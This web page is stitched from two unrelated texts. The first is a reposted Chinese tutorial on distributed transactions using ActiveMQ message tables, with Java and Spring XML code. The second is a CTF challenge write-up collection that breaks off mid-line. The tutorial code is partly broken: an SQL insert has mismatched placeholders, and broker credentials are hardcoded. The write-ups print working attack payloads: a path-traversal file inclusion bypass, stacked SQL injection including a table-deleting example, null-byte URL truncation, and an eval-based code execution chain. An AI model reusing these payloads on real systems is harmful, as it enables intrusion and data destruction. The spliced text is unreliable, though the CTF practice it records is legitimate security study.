...宝和余额宝使用不同的数据库 如图： 2、分布式事务解决方案 1、基于数据库XA协议的两段提交 XA协议是数据库支持的一种协议，其核心是一个事务管理器用来统一管理两个分布式数据库，如图 事务管理器负责跟支付宝数据库和余额宝数据库打交道，一旦有一个数据库连接失败，另一个数据库的操作就不会进行，一个数据库操作失败就会导致另一个数据库回滚，只有他们全部成功两个数据库的事务才会提交。 基于XA协议的两段和三段提交是一种严格的安全确认机制，其安全性是非常高的，但是保证安全性的前提是牺牲了性能，这个就是分布式系统里面的CAP理论，做任何架构的前提需要有取舍。所以基于XA协议的分布式事务并发性不高，不适合高并发场景。 2、基于activemq的解决方案 如图： 1、支付宝扣款成功时往message表插入消息 2、message表有message_id(流水id，标识夸系统的一次转账操作),status（confirm，unconfirm） 3、timer扫描message表的unconfirm状态记录往activemq插入消息 4、余额宝收到消息消费消息时先查询message表如果有记录就不处理如果没记录就进行数据库增款操作 5、如果余额宝数据库操作成功往余额宝message表插入消息，表字段跟支付宝message一致 6、如果5操作成功，回调支付宝接口修改message表状态，把unconfirm状态转换成confirm状态 问题描述： 1、支付宝设计message表的目的 如果支付宝往activemq插入消息而余额宝消费消息异常，有可能是消费消息成功而事务操作异常，有可能是网络异常等等不确定因素。如果出现异常而activemq收到了确认消息的信号，这时候activemq中的消息是删除了的，消息丢失了。设置message表就是有一个消息存根，activemq中消息丢失了message表中的消息还在。解决了activemq消息丢失问题 2、余额宝设计message表的目的 当余额宝消费成功并且数据库操作成功时，回调支付宝的消息确认接口，如果回调接口时出现异常导致支付宝状态修改失败还是unconfirm状态，这时候还会被timer扫描到，又会往activemq插入消息，又会被余额宝消费一边，但是这条消息已经消费成功了的只是回调失败而已，所以就需要有一个这样的message表，当余额宝消费时先插入message表，如果message根据message_id能查询到记录就说明之前这条消息被消费过就不再消费只需要回调成功即可，如果查询不到消息就消费这条消息继续数据库操作，数据库操作成功就往message表插入消息。 这样就解决了消息重复消费问题，这也是消费端的幂等操作。 基于消息中间件的分布式事务是最理想的分布式事务解决方案，兼顾了安全性和并发性！ 接下来贴代码： 支付宝代码： @Controller@RequestMapping("/order")public class OrderController {/ @Description TODO @param @return 参数 @return String 返回类型 @throws userID：转账的用户ID amount：转多少钱/@Autowired@Qualifier("activemq")OrderService orderService;@RequestMapping("/transfer")public @ResponseBody String transferAmount(String userId,String messageId, int amount) {try {orderService.updateAmount(amount,messageId, userId);}catch (Exception e) {e.printStackTrace();return "===============================transferAmount failed===================";}return "===============================transferAmount successfull===================";}@RequestMapping("/callback")public String callback(String param) {JSONObject parse = JSONObject.parseObject(param);String respCode = parse.getString("respCode");if(!"OK".equalsIgnoreCase(respCode)) {return null;}try {orderService.updateMessage(param);}catch (Exception e) {e.printStackTrace();return "fail";}return "ok";} } public interface OrderService {public void updateAmount(int amount, String userId,String messageId);public void updateMessage(String param);} @Service("activemq")@Transactional(rollbackFor = Exception.class)public class OrderServiceActivemqImpl implements OrderService {Logger logger = LoggerFactory.getLogger(getClass());@AutowiredJdbcTemplate jdbcTemplate;@AutowiredJmsTemplate jmsTemplate;@Overridepublic void updateAmount(final int amount, final String messageId, final String userId) {String sql = "update account set amount = amount - ?,update_time=now() where user_id = ?";int count = jdbcTemplate.update(sql, new Object[]{amount, userId});if (count == 1) {//插入到消息记录表sql = "insert into message(user_id,message_id,amount,status) values (?,?,?,?)";int row = jdbcTemplate.update(sql,new Object[]{userId,messageId,amount,"unconfirm"});if(row == 1) {//往activemq中插入消息jmsTemplate.send("zg.jack.queue", new MessageCreator() {@Overridepublic Message createMessage(Session session) throws JMSException {com.zhuguang.jack.bean.Message message = new com.zhuguang.jack.bean.Message();message.setAmount(Integer.valueOf(amount));message.setStatus("unconfirm");message.setUserId(userId);message.setMessageId(messageId);return session.createObjectMessage(message);} });} }}@Overridepublic void updateMessage(String param) {JSONObject parse = JSONObject.parseObject(param);String messageId = parse.getString("messageId");String sql = "update message set status = ? where message_id = ?";int count = jdbcTemplate.update(sql,new Object[]{"confirm",messageId});if(count == 1) {logger.info(messageId + " callback successfull");} }} activemq.xml <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:amq="http://activemq.apache.org/schema/core"xmlns:jms="http://www.springframework.org/schema/jms"xmlns:context="http://www.springframework.org/schema/context"xmlns:mvc="http://www.springframework.org/schema/mvc"xsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans-4.1.xsdhttp://www.springframework.org/schema/contexthttp://www.springframework.org/schema/context/spring-context-4.1.xsdhttp://www.springframework.org/schema/mvchttp://www.springframework.org/schema/mvc/spring-mvc-4.1.xsdhttp://www.springframework.org/schema/jmshttp://www.springframework.org/schema/jms/spring-jms-4.1.xsdhttp://activemq.apache.org/schema/corehttp://activemq.apache.org/schema/core/activemq-core-5.12.1.xsd"><context:component-scan base-package="com.zhuguang.jack" /><mvc:annotation-driven /><amq:connectionFactory id="amqConnectionFactory"brokerURL="tcp://192.168.88.131:61616"userName="system"password="manager" /><!-- 配置JMS连接工长 --><bean id="connectionFactory"class="org.springframework.jms.connection.CachingConnectionFactory"><constructor-arg ref="amqConnectionFactory" /><property name="sessionCacheSize" value="100" /></bean><!-- 定义消息队列（Queue） --><bean id="demoQueueDestination" class="org.apache.activemq.command.ActiveMQQueue"><!-- 设置消息队列的名字 --><constructor-arg><value>zg.jack.queue</value></constructor-arg></bean><!-- 配置JMS模板（Queue），Spring提供的JMS工具类，它发送、接收消息。 --><bean id="jmsTemplate" class="org.springframework.jms.core.JmsTemplate"><property name="connectionFactory" ref="connectionFactory" /><property name="defaultDestination" ref="demoQueueDestination" /><property name="receiveTimeout" value="10000" /><!-- true是topic，false是queue，默认是false，此处显示写出false --><property name="pubSubDomain" value="false" /></bean></beans> spring-dispatcher.xml <beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:p="http://www.springframework.org/schema/p"xmlns:context="http://www.springframework.org/schema/context"xmlns:task="http://www.springframework.org/schema/task" xmlns:aop="http://www.springframework.org/schema/aop"xmlns:tx="http://www.springframework.org/schema/tx"xmlns:util="http://www.springframework.org/schema/util" xmlns:mvc="http://www.springframework.org/schema/mvc"xsi:schemaLocation="http://www.springframework.org/schema/utilhttp://www.springframework.org/schema/util/spring-util-3.2.xsdhttp://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.2.xsdhttp://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.2.xsdhttp://www.springframework.org/schema/mvchttp://www.springframework.org/schema/mvc/spring-mvc-3.2.xsdhttp://www.springframework.org/schema/task http://www.springframework.org/schema/task/spring-task-3.0.xsdhttp://www.springframework.org/schema/txhttp://www.springframework.org/schema/tx/spring-tx-3.0.xsdhttp://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-3.0.xsd"><!-- 引入同文件夹下的redis属性配置文件 --><!-- 解决springMVC响应数据乱码 text/plain就是响应的时候原样返回数据--><import resource="../activemq/activemq.xml"/><!--<context:property-placeholder ignore-unresolvable="true" location="classpath:config/core/core.properties,classpath:config/redis/redis-config.properties" />--><bean id="propertyConfigurerForProject1" class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer"><property name="order" value="1" /><property name="ignoreUnresolvablePlaceholders" value="true" /><property name="location"><value>classpath:config/core/core.properties</value></property></bean><mvc:annotation-driven><mvc:message-converters register-defaults="true"><bean class="org.springframework.http.converter.StringHttpMessageConverter"><property name="supportedMediaTypes" value = "text/plain;charset=UTF-8" /></bean></mvc:message-converters></mvc:annotation-driven><!-- 避免IE执行AJAX时,返回JSON出现下载文件 --><bean id="mappingJacksonHttpMessageConverter" class="org.springframework.http.converter.json.MappingJacksonHttpMessageConverter"><property name="supportedMediaTypes"><list><value>text/html;charset=UTF-8</value></list></property></bean><!-- 开启controller注解支持 --><!-- 注：如果base-package=com.avicit 则注解事务不起作用 TODO 读源码 --><context:component-scan base-package="com.zhuguang"></context:component-scan><mvc:view-controller path="/" view-name="redirect:/index" /><beanclass="org.springframework.web.servlet.mvc.annotation.DefaultAnnotationHandlerMapping" /><bean id="handlerAdapter"class="org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter"></bean><beanclass="org.springframework.web.servlet.view.ContentNegotiatingViewResolver"><property name="mediaTypes"><map><entry key="json" value="application/json" /><entry key="xml" value="application/xml" /><entry key="html" value="text/html" /></map></property><property name="viewResolvers"><list><bean class="org.springframework.web.servlet.view.BeanNameViewResolver" /><bean class="org.springframework.web.servlet.view.UrlBasedViewResolver"><property name="viewClass" value="org.springframework.web.servlet.view.JstlView" /><property name="prefix" value="/" /><property name="suffix" value=".jsp" /></bean></list></property></bean><!-- 支持上传文件 --> <!-- 控制器异常处理 --><bean id="exceptionResolver"class="org.springframework.web.servlet.handler.SimpleMappingExceptionResolver"><property name="exceptionMappings"><props><prop key="java.lang.Exception">error</prop></props></property></bean><bean id="dataSource" class="com.mchange.v2.c3p0.ComboPooledDataSource" destroy-method="close"><property name="driverClass"><value>${jdbc.driverClassName}</value></property><property name="jdbcUrl"><value>${jdbc.url}</value></property><property name="user"><value>${jdbc.username}</value></property><property name="password"><value>${jdbc.password}</value></property><property name="minPoolSize" value="10" /><property name="maxPoolSize" value="100" /><property name="maxIdleTime" value="1800" /><property name="acquireIncrement" value="3" /><property name="maxStatements" value="1000" /><property name="initialPoolSize" value="10" /><property name="idleConnectionTestPeriod" value="60" /><property name="acquireRetryAttempts" value="30" /><property name="breakAfterAcquireFailure" value="false" /><property name="testConnectionOnCheckout" value="false" /><property name="acquireRetryDelay"><value>100</value></property></bean><bean id="jdbcTemplate" class="org.springframework.jdbc.core.JdbcTemplate"><property name="dataSource" ref="dataSource"></property></bean><bean id="transactionManager" class="org.springframework.jdbc.datasource.DataSourceTransactionManager"><property name="dataSource" ref="dataSource"/></bean><tx:annotation-driven transaction-manager="transactionManager" proxy-target-class="true" /><aop:aspectj-autoproxy expose-proxy="true"/></beans> logback.xml <?xml version="1.0" encoding="UTF-8"?><!--scan：当此属性设置为true时，配置文件如果发生改变，将会被重新加载，默认值为true。scanPeriod：设置监测配置文件是否有修改的时间间隔，如果没有给出时间单位，默认单位是毫秒当scan为true时，此属性生效。默认的时间间隔为1分钟。debug：当此属性设置为true时，将打印出logback内部日志信息，实时查看logback运行状态。默认值为false。--><configuration scan="false" scanPeriod="60 seconds" debug="false"><!-- 定义日志的根目录 --><!-- <property name="LOG_HOME" value="/app/log" /> --><!-- 定义日志文件名称 --><property name="appName" value="netty"></property><!-- ch.qos.logback.core.ConsoleAppender 表示控制台输出 --><appender name="stdout" class="ch.qos.logback.core.ConsoleAppender"><Encoding>UTF-8</Encoding><!--日志输出格式：%d表示日期时间，%thread表示线程名，%-5level：级别从左显示5个字符宽度%logger{50} 表示logger名字最长50个字符，否则按照句点分割。 %msg：日志消息，%n是换行符--><encoder><pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} [%thread] %-5level %logger{50} - %msg%n</pattern></encoder></appender><!-- 滚动记录文件，先将日志记录到指定文件，当符合某个条件时，将日志记录到其他文件 --> <appender name="appLogAppender" class="ch.qos.logback.core.rolling.RollingFileAppender"><Encoding>UTF-8</Encoding><!-- 指定日志文件的名称 --> <file>${appName}.log</file><!--当发生滚动时，决定 RollingFileAppender 的行为，涉及文件移动和重命名TimeBasedRollingPolicy： 最常用的滚动策略，它根据时间来制定滚动策略，既负责滚动也负责出发滚动。--><rollingPolicy class="ch.qos.logback.core.rolling.TimeBasedRollingPolicy"><!--滚动时产生的文件的存放位置及文件名称 %d{yyyy-MM-dd}：按天进行日志滚动 %i：当文件大小超过maxFileSize时，按照i进行文件滚动--><fileNamePattern>${appName}-%d{yyyy-MM-dd}-%i.log</fileNamePattern><!-- 可选节点，控制保留的归档文件的最大数量，超出数量就删除旧文件。假设设置每天滚动，且maxHistory是365，则只保存最近365天的文件，删除之前的旧文件。注意，删除旧文件是，那些为了归档而创建的目录也会被删除。--><MaxHistory>365</MaxHistory><!-- 当日志文件超过maxFileSize指定的大小是，根据上面提到的%i进行日志文件滚动 注意此处配置SizeBasedTriggeringPolicy是无法实现按文件大小进行滚动的，必须配置timeBasedFileNamingAndTriggeringPolicy--><timeBasedFileNamingAndTriggeringPolicy class="ch.qos.logback.core.rolling.SizeAndTimeBasedFNATP"><maxFileSize>100MB</maxFileSize></timeBasedFileNamingAndTriggeringPolicy></rollingPolicy><!--日志输出格式：%d表示日期时间，%thread表示线程名，%-5level：级别从左显示5个字符宽度 %logger{50} 表示logger名字最长50个字符，否则按照句点分割。 %msg：日志消息，%n是换行符--> <encoder><pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} [ %thread ] - [ %-5level ] [ %logger{50} : %line ] - %msg%n</pattern></encoder></appender><!-- logger主要用于存放日志对象，也可以定义日志类型、级别name：表示匹配的logger类型前缀，也就是包的前半部分level：要记录的日志级别，包括 TRACE < DEBUG < INFO < WARN < ERRORadditivity：作用在于children-logger是否使用 rootLogger配置的appender进行输出，false：表示只用当前logger的appender-ref，true：表示当前logger的appender-ref和rootLogger的appender-ref都有效--><!-- <logger name="edu.hyh" level="info" additivity="true"><appender-ref ref="appLogAppender" /></logger> --><!-- root与logger是父子关系，没有特别定义则默认为root，任何一个类只会和一个logger对应，要么是定义的logger，要么是root，判断的关键在于找到这个logger，然后判断这个logger的appender和level。 --><root level="debug"><appender-ref ref="stdout" /><appender-ref ref="appLogAppender" /></root></configuration> 2、余额宝代码 package com.zhuguang.jack.controller;import com.alibaba.fastjson.JSONObject;import com.zhuguang.jack.service.OrderService;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.web.bind.annotation.ResponseBody;@Controller@RequestMapping("/order")public class OrderController {/ @Description TODO @param @return 参数 @return String 返回类型 @throws 模拟银行转账 userID：转账的用户ID amount：转多少钱/@AutowiredOrderService orderService;@RequestMapping("/transfer")public @ResponseBody String transferAmount(String userId, String amount) {try {orderService.updateAmount(Integer.valueOf(amount), userId);}catch (Exception e) {e.printStackTrace();return "===============================transferAmount failed===================";}return "===============================transferAmount successfull===================";} } 消息监听器 package com.zhuguang.jack.listener;import com.alibaba.fastjson.JSONObject;import com.zhuguang.jack.service.OrderService;import org.slf4j.Logger;import org.slf4j.LoggerFactory;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.http.client.SimpleClientHttpRequestFactory;import org.springframework.stereotype.Service;import org.springframework.transaction.annotation.Transactional;import org.springframework.web.client.RestTemplate;import javax.jms.JMSException;import javax.jms.Message;import javax.jms.MessageListener;import javax.jms.ObjectMessage;@Service("queueMessageListener")public class QueueMessageListener implements MessageListener {private Logger logger = LoggerFactory.getLogger(getClass());@AutowiredOrderService orderService;@Transactional(rollbackFor = Exception.class)@Overridepublic void onMessage(Message message) {if (message instanceof ObjectMessage) {ObjectMessage objectMessage = (ObjectMessage) message;try {com.zhuguang.jack.bean.Message message1 = (com.zhuguang.jack.bean.Message) objectMessage.getObject();String userId = message1.getUserId();int count = orderService.queryMessageCountByUserId(userId);if (count == 0) {orderService.updateAmount(message1.getAmount(), message1.getUserId());orderService.insertMessage(message1.getUserId(), message1.getMessageId(), message1.getAmount(), "ok");} else {logger.info("异常转账");}RestTemplate restTemplate = createRestTemplate();JSONObject jo = new JSONObject();jo.put("messageId", message1.getMessageId());jo.put("respCode", "OK");String url = "http://jack.bank_a.com:8080/alipay/order/callback?param="+ jo.toJSONString();restTemplate.getForObject(url,null);} catch (JMSException e) {e.printStackTrace();throw new RuntimeException("异常");} }}public RestTemplate createRestTemplate() {SimpleClientHttpRequestFactory simpleClientHttpRequestFactory = new SimpleClientHttpRequestFactory();simpleClientHttpRequestFactory.setConnectTimeout(3000);simpleClientHttpRequestFactory.setReadTimeout(2000);return new RestTemplate(simpleClientHttpRequestFactory);} } package com.zhuguang.jack.service;public interface OrderService {public void updateAmount(int amount, String userId);public int queryMessageCountByUserId(String userId);public int insertMessage(String userId,String messageId,int amount,String status);} package com.zhuguang.jack.service;import org.slf4j.Logger;import org.slf4j.LoggerFactory;import org.springframework.beans.factory.annotation.Autowired;import org.springframework.http.client.SimpleClientHttpRequestFactory;import org.springframework.jdbc.core.JdbcTemplate;import org.springframework.stereotype.Service;import org.springframework.transaction.annotation.Transactional;import org.springframework.web.client.RestTemplate;@Service@Transactional(rollbackFor = Exception.class)public class OrderServiceImpl implements OrderService {private Logger logger = LoggerFactory.getLogger(getClass());@AutowiredJdbcTemplate jdbcTemplate;/ 更新数据库表，把账户余额减去amountd/@Overridepublic void updateAmount(int amount, String userId) {//1、农业银行转账3000，也就说农业银行jack账户要减3000String sql = "update account set amount = amount + ?,update_time=now() where user_id = ?";int count = jdbcTemplate.update(sql, new Object[] {amount, userId});if (count != 1) {throw new RuntimeException("订单创建失败，农业银行转账失败！");} }public RestTemplate createRestTemplate() {SimpleClientHttpRequestFactory simpleClientHttpRequestFactory = new SimpleClientHttpRequestFactory();simpleClientHttpRequestFactory.setConnectTimeout(3000);simpleClientHttpRequestFactory.setReadTimeout(2000);return new RestTemplate(simpleClientHttpRequestFactory);}@Overridepublic int queryMessageCountByUserId(String messageId) {String sql = "select count() from message where message_id = ?";int count = jdbcTemplate.queryForInt(sql, new Object[]{messageId});return count;}@Overridepublic int insertMessage(String userId, String message_id,int amount, String status) {String sql = "insert into message(user_id,message_id,amount,status) values(?,?,?)";int count = jdbcTemplate.update(sql, new Object[]{userId, message_id,amount, status});if(count == 1) {logger.info("Ok");}return count;} } activemq.xml <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:amq="http://activemq.apache.org/schema/core"xmlns:jms="http://www.springframework.org/schema/jms"xmlns:context="http://www.springframework.org/schema/context"xmlns:mvc="http://www.springframework.org/schema/mvc"xsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans-4.1.xsdhttp://www.springframework.org/schema/contexthttp://www.springframework.org/schema/context/spring-context-4.1.xsdhttp://www.springframework.org/schema/mvchttp://www.springframework.org/schema/mvc/spring-mvc-4.1.xsdhttp://www.springframework.org/schema/jmshttp://www.springframework.org/schema/jms/spring-jms-4.1.xsdhttp://activemq.apache.org/schema/corehttp://activemq.apache.org/schema/core/activemq-core-5.12.1.xsd"><context:component-scan base-package="com.zhuguang.jack" /><mvc:annotation-driven /><amq:connectionFactory id="amqConnectionFactory"brokerURL="tcp://192.168.88.131:61616"userName="system"password="manager" /><!-- 配置JMS连接工长 --><bean id="connectionFactory"class="org.springframework.jms.connection.CachingConnectionFactory"><constructor-arg ref="amqConnectionFactory" /><property name="sessionCacheSize" value="100" /></bean><!-- 定义消息队列（Queue） --><bean id="demoQueueDestination" class="org.apache.activemq.command.ActiveMQQueue"><!-- 设置消息队列的名字 --><constructor-arg><value>zg.jack.queue</value></constructor-arg></bean><!-- 显示注入消息监听容器（Queue），配置连接工厂，监听的目标是demoQueueDestination，监听器是上面定义的监听器 --><bean id="queueListenerContainer"class="org.springframework.jms.listener.DefaultMessageListenerContainer"><property name="connectionFactory" ref="connectionFactory" /><property name="destination" ref="demoQueueDestination" /><property name="messageListener" ref="queueMessageListener" /></bean><!-- 配置JMS模板（Queue），Spring提供的JMS工具类，它发送、接收消息。 --><bean id="jmsTemplate" class="org.springframework.jms.core.JmsTemplate"><property name="connectionFactory" ref="connectionFactory" /><property name="defaultDestination" ref="demoQueueDestination" /><property name="receiveTimeout" value="10000" /><!-- true是topic，false是queue，默认是false，此处显示写出false --><property name="pubSubDomain" value="false" /></bean></beans> OK~~~~~~~~~~~~大功告成！！！， 如果大家觉得满意并且对技术感兴趣请加群：171239762， 纯技术交流群，非诚勿扰。 本篇文章为转载内容。原文链接：https://blog.csdn.net/luoyang_java/article/details/84953241。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

... 2019]EasySQL [GYCTF2020]Blacklist [GKCTF2020]cve版签到 GXYCTF2019禁止套娃 [De1CTF 2019]SSRF Me [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [极客大挑战 2019]Secret File [ACTF2020 新生赛]Include 2018]easy_tornado [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [RoarCTF 2019]Easy Calc [极客大挑战 2019]Knife [ACTF2020 新生赛]Exec [极客大挑战 2019]PHP [极客大挑战 2019]Http [HCTF 2018]admin [极客大挑战 2019]BabySQL [HCTF 2018]WarmUp 这里补充一个知识点：phpmyadmin 4.8.1任意文件包含 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号，然后返回问号的位置，就是=4//所以想绕过这里，直接?flag，他检测到的问号就是0，然后0，0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话，empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入：1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 （为2） 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来，这个符号是 esc下面一个的按键，这个符号在mysql里 用于 分割其他命令，表示此为（表名、字段名） 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢？ select 函数被过滤了，其实mysql的函数有很多 这里通过 MYSQL的预处理语句，使用 : concat（'s','elect',' from 1919810931114514'） 完成绕过 构造pyload： 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字，字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说，没有回显，联合查询基本没戏。 好在页面会进行相应的变化，证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: 